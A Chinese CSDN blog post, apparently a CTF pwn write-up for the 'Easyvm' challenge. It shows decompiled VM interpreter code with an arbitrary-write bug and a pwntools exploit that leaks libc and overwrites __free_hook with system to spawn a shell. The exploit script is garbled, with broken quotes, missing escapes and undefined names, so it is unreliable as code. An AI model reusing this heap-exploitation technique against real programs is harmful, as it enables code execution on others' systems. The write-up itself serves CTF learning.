vmpwn一&高校战役Easyvm复现

最新推荐文章于 2023-07-28 17:40:05 发布
最新推荐文章于 2023-07-28 17:40:05 发布
阅读量275 收藏 1
点赞数
分类专栏: CTF PWN 文章标签: 算法 系统安全 安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119944552
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

高校战役Easyvm

前言:本人tcl,刚接触vm不久,这个看了别人的wp感觉难度还可以,决定自己复现一下大佬勿喷哈
此题思路:就是依靠任意地址写来打freehook,然后再一把唆onegadget可以system也可以!!

int __cdecl main(int argc, const char argv, const char **envp)
{
void *buf; // ST2C_4
_DWORD *ptr; // [esp+18h] [ebp-18h]
int v5; // [esp+ACh] [ebp+7Ch]
sub_830();
ptr = sub_DD5();//数组表0-10,其中10是calloc
while ( 1 )
{
switch ( sub_931() )
{
  case 1:
    buf = malloc(0x300u);
    read(0, buf, 0x2FFu);
    ptr[8] = buf;//将数据opcode读取到了ptr[8]
    break;
  case 2:
    if ( !ptr )
      exit(0);
    sub_A16(ptr);  //(1) opcode
    break;
  case 3:
    if ( !ptr )
      exit(0);
    free((void *)ptr[10]);
    free(ptr);
    break;
  case 4:
    puts("Maybe a bug is a gif?");
    dword_305C = v5;//经过反复测试存在了一个libc地址
    ptr[8] = &unk_3020;  //(2)opcode表
    break;
  case 5:
    puts("Zzzzzz........");
    exit(0);
    return;
  default:
    puts("Are you kidding me ?");
    break;
}
}
}

以上是主函数的逻辑,也没啥,就是可以往freehook去想

我们看看opcode指令有那些:
(1):

*unsigned int __cdecl sub_A16(_DWORD a1)
{
int v1; // ecx
_BYTE *v2; // ST28_4
unsigned int result; // eax
unsigned int v4; // et1
unsigned int v5; // [esp+1Ch] [ebp-Ch]
v5 = __readgsdword(0x14u);
while ( 1 )
{

if ( *(_BYTE *)a1[8] == 113 )
{
  a1[6] -= 4;
  *(_DWORD *)a1[6] = *(_DWORD *)(a1[8] + 1);   
  a1[8] += 5;
}
if ( *(_BYTE *)a1[8] == 65 )
{
  a1[1] += a1[2];//add
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 66 )
{
  a1[1] -= a1[4];   //sub
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 67 )
{
  a1[1] *= a1[3];    
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 68 )
{
  a1[1] /= a1[5];
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 0x80u )
{
  a1[sub_9C3((int)a1, 1u)] = *(_DWORD *)(a1[8] + 2);  //漏洞点,由于索引没有经过严格的控制所以存在漏洞,可以达到任意地址写
  a1[8] += 6;
}
if ( *(_BYTE *)a1[8] == 119 )
{
  a1[1] ^= a1[9];
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 83 )
{
  putchar(*(char *)a1[3]);  //可以用来泄露我们的东西
  a1[8] += 2;
}
if ( *(_BYTE *)a1[8] == 34 )
{
  v1 = a1[2];
  a1[1] >>= v1;
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 35 )
{
  v1 = a1[2];
  a1[1] <<= v1;
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == -103 )
  break;
if ( *(_BYTE *)a1[8] == 118 )
{
  a1[3] = *(_DWORD *)a1[6];
  *(_DWORD *)a1[6] = 0;
  a1[6] += 4;
  a1[8] += 5;
}
if ( *(_BYTE *)a1[8] == 84 )
{
  v2 = (_BYTE *)a1[3];
  *v2 = getchar();   //真正的写入数据任意地址写,一次能写一个字节
  a1[8] += 2;
}
if ( *(_BYTE *)a1[8] == 48 )
{
  a1[1] |= a1[2];
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 49 )
{
  a1[1] &= a1[2];
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 9 )
{
  a1[1] = dword_305C;  可以发现把libc地址赋值给了它
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 16 )
{
  a1[9] = a1[1];
  ++a1[8];
}
if ( *(_BYTE *)a1[8] == 17 )
{
  printf("%p\n", a1[1]);//这里泄露libc
  ++a1[8];
}
}
v4 = __readgsdword(0x14u);
result = v4 ^ v5;
if ( v4 != v5 )
sub_1080(v1);
return result;
}

主要的程序已分析完毕,现在开始写exp:

from pwn import 
P=process(‘easyvm’)
def add(content):
p.sendlineafter(“>>>”,’1’)
p.send(content)
def free():
p.sendlineafter(“>>>”,’3’)
p.sendlineafter(‘>>>’,’4’)
Op1=’x09x11x99’
Add(op1)
p.sendlineafter(‘>>>’,’2’)
p.recvuntil(‘0x’)
Free_got=int(p.recv(8),16)+0x28fc
Libc_base=’’
for i in range(4): 
Op2=’x80’+chr(3)+p32(free_got+i)+’x53’+’x99’+’x99’
Add(op2)
P.sendlineafter(‘>>>’,2)
Libc_base+=p.recvuntil(‘duce’,True)[-1:]
System=libc_base+libc.sym[‘system’]
bin_addr=libc_base+next(libc.search(‘/bin/shx00’))
Free_hook=libc_base+libc.sym[‘free_hook’]
For i in range(4):
    op3=’\x80’+chr(3)+p32(free_hook+i)+’\x54’+’\x99’
    Add(op3)
    p.sendlineafter(‘>>>’,’2’)
    P.send(p32(system)[i])
For i in range(4):
   Op4=’\x80’+chr(16)+p32(bin_addr+i)+’\x99’+’\x99’
   Add(op4)
   p.sendlineafter(‘>>>’,’2’)
Free()
P.interactive()

总结:这道vm题难度尚可,对于我这种刚接触vm题型的人来说比较容易,也欢迎大佬门来喷我!!!!tcl

jsjsj11123
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 easyvm
weixin_43798872的博客
12-06 459
攻防世界 进阶 easyvm
VMPWN的入门系列-1
YJ_12340的博客
07-27 988
这是一道基础的VM相关题目,VMPWN的入门级别题目。前面提到VMPWN一般都是接收字节码然后对字节码进行解析,但是这道题目不接受字节码,它接收字节码的更高一级语言:汇编。程序直接接收类似”mov”、”add”之类的指令,可以把这道题目看作是一个执行汇编语言的处理器,相比于解析字节码的VM,逆向难度要大大减小。非常适合入门。
VMPWN的入门级别题目详解(一)
蚁景网安学院
07-26 1149
这是一道基础的VM相关题目,VMPWN的入门级别题目。前面提到VMPWN一般都是接收字节码然后对字节码进行解析,但是这道题目不接受字节码,它接收字节码的更高一级语言:汇编。程序直接接收类似”mov”、”add”之类的指令,可以把这道题目看作是一个执行汇编语言的处理器,相比于解析字节码的VM,逆向难度要大大减小。非常适合入门。
VMPWN的入门系列-2
最新发布
蚁景网安学院
07-28 275
温馨提示:文章有点长,图片比较多,请耐心阅读实验四 VMPWN4题目简介这道题应该算是虚拟机保护的一个变种,是一个解释器类型的程序,何为解释器?解释器是一种计算机程序,用于解释和执行源代码。解释器可以理解源代码中的语法和语义,并将其转换为计算机可以执行的机器语言。与编译器不同,解释器不会将源代码转换为机器语言,而是直接执行源代码。即,这个程序接收一定的解释器语言,然后按照一定的规则对其进行解析,完...
vm-pwn入门
蚁景网安学院
09-21 629
亲爱的,关注我吧9/21文章共计2761个词预计阅读7分钟来和我一起阅读吧引言之前一直没去了解过vm-pwn,做一些题目对vm-pwn进行一个大体上的了解,算是入门。前置知识对指令有过了...
简述中国4G战役
01-19
自从扛起了TD-SCDMA这面民族创新的大旗,TD-SCDMA是英文Time Division-Synchronous Code Division Multiple Access(时分同步码分多址) 的简称,是一种第三代无线通信的技术标准,也是ITU批准的三个3G标准中的一个...
致敬战役者文字海报设计
07-22
致敬战役者文字海报设计适用于致敬战役者海报设计。
XX第一战役企划指导方案.ppt
01-02
XX第一战役企划指导方案.ppt
高校管理学院网站源代码
02-04
1111经过md5加密后c67bf196a4758191e4 Dim SitePath '网站安装目录,如/laoy3.0/,根目录填写/即可 ... SitePath = "/glxy/" 如果在根目录就用/ ...数据库文件和uploadfiles文件夹属性共享设置为可读可写。...
easyVM v0.2
07-11
easyVM是一个简单的虚拟机。<br>0.1版本只支持8086指令集和一些简单的I/O设备,只支持英文文本显示方式。<br>0.2版本主要是在0.1版基础上加了一小部分32位指令(push eax等),使得easyVM可以运行MS-DOS 6.22自带的大部分程序。<br>
Antctf-vmpwn
03-15
Antctf-real_vmpwn写 该主题通过对vmware dhcp组件进行了神奇的修改,介绍了旧版本中的cve-2020-3947 UAF漏洞和静默固定变量未初始化的漏洞。 此漏洞组合可能导致较低版本(<15.1.2)的实际转义,因此将该漏洞命名为real_vmpwn
2022 TQLCTF pwn easyvm
yongbaoii的博客
02-22 600
题目很有意思,肝了不少时间。
分析easyVM 未完成)
weixin_34198797的博客
10-01 123
E:\test\easyVM_Small_指令解析,cpu虚拟设备虚拟,比如display, DMA, floppy, harddisk, keyboard, PIC, printer, RTC, timer,serial程序flow, 架构低调发布easyVM 0.2版简介:====================easyVM是一个简单的虚拟机。0.1版本只支持8086指令集和一些简单的I/O设...
VM pwn入门
weixin_44145820的博客
06-07 2044
VM pwn貌似是最近火起来的一类PWN题。最近打的好几场比赛都出现了VM pwn的题目,正好在BUU上面遇到一道2019年的OGeek中出现的VM pwn题,感觉应该会比较简单,另外听说高校战役里的EasyVM也是偏简单的VM pwn题。本文就主要对这两道题目进行分析。 [OGeek2019 Final]OVM 程序分析 作为VM pwn的第一步就是需要搞清楚指令的格式,操作码和操作数 本题使用的是定长指令,一共32bits,每一个占8bits,但除了操作码能利用完8bits之外,寄存器只占4bits,
2019UNCTF easyvm
weixin_43884935的博客
03-14 1055
虚拟机逆向入门----2019UNCTF easyvm 自己也是个萌新,难得做了一道虚拟机逆向的题目,还是想分享出来 看题目知道这是一个虚拟机逆向题目,运行一下知道这是匹配字符串 之后用IDA64进行分析,主函数的逻辑还是比较清楚的。 先给s上的96字节置0,再给v3分配40字节空间。调用sub_400C1E初始化v3上的内容。用s接收32字符,如果不是32长度就失败,如果是,则调用 v3函数指...
[XCTF-Reverse] 83 2019_UNCTF_easyvm
weixin_52640415的博客
03-28 461
到了后边就都不会了,只有这个VM还可以磨磨 主程序非常短,输入32个字节然后就去比较了 signed __int64 __fastcall main(__int64 a1, char **a2, char **a3) { unsigned int (__fastcall ***v3)(_QWORD, void *, void *, char *); // rbx char s; // [rsp+10h] [rbp-80h] int v6; // [rsp+70h] [rbp-20h]
CTF pwn题之虚拟机题型详解
lifanxin的博客
05-24 1461
虚拟机题型详解概述如何分析一个例子总结 概述   随着对pwn题的学习,慢慢开始接触VM虚拟机的pwn题了,刚开始做这种类型的题时会发现代码量比较大,略显复杂,复杂的部分主要是在用程序实现虚拟机指令那里。   其实这种题做法和普通pwn类似,也是寻找漏洞,复杂的地方在于需要我们去分析出虚拟机实现的指令,然后用这些指令操作进行漏洞利用。 如何分析   接下来介绍下如何分析,对于VM类型的pwn题,复杂的地方在于分析出该VM对应实现的指令,那么如何分析需要一定章法。这里需要简单知晓一些计算机组成原理和汇编语言的
一道题目入门VMpwn
qq_40712959的博客
04-16 320
一道题目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
华北战役都是哪两方在对抗
06-10
华北战役是中国军队和日本侵略军在华北地区进行的一次重大战役。具体来说,华北战役主要是中国军队的八路军和新四军与日本侵略军的华北方面军进行的。战役开始于1940年9月,结束于1941年1月,期间双方进行了多次交战...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值